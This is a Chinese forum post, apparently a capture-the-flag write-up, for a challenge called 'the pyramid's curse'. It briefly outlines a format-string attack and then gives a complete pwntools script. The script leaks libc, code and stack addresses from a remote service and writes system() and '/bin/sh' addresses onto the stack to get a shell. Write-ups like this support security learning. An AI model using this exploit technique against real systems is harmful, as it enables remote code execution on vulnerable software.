首页
论坛
专栏
课程

[原创] 第三题:金字塔的诅咒

2019-6-22 22:09 324

[原创] 第三题:金字塔的诅咒

2019-6-22 22:09
324

格式化字符串攻击。
泄露栈地址,libc地址
栈上存在指向栈的指针
通过格式化字符串攻击修改栈上内容,使其指向rbp-4和rbp-8
通过格式化字符串攻击写rop

base=0x56555000
from pwn import *
cn=remote("152.136.18.34",9999)
#cn=process("./format",shell=False )
elf=ELF("./format")
context.log_level='debug'
#gdb.attach(cn,"b *"+hex(base+0x8F8)+"\n b *"+hex(base+0x890))

def send_data(inx,data):
    cn.sendafter("oice:",inx)
    cn.sendlineafter("ou want to say:",data)

def change(offset,data):
    send_data("1\n", "%" + str(u16(data)) + "c%%%d$hn"%offset)

send_data("1","%11$x")
libc_base=int(cn.recv(8),16)-0x18637
success(hex(libc_base))
sys_addr=libc_base+0x03a940
sh_addr=libc_base+0x15902b

send_data("1","%3$x")
code_base=int(cn.recv(8),16)-0x8f3
success(hex(code_base))
string_addr=code_base+0x200C

send_data("1","%5$x")
stack=int(cn.recv(8),16)-0xcc
success(hex(stack))
rbp_addr=stack+0x30
step1_addr=rbp_addr+0xac
buf_addr=rbp_addr-0x10
success(hex(buf_addr))
success(hex(rbp_addr))
success(hex(step1_addr))

change(5,p32(rbp_addr+4)[0:2])
change(53,p32(sys_addr)[0:2])
change(5,p32(rbp_addr+6)[0:2])
change(53,p32(sys_addr)[2:4])

change(5,p32(rbp_addr+12)[0:2])
change(53,p32(sh_addr)[0:2])
change(5,p32(rbp_addr+14)[0:2])
change(53,p32(sh_addr)[2:4])
cn.recv()

cn.interactive()


[公告]安全服务和外包项目请将项目需求发到看雪企服平台:https://qifu.kanxue.com

最新回复 (0)
游客
登录 | 注册 方可回帖
返回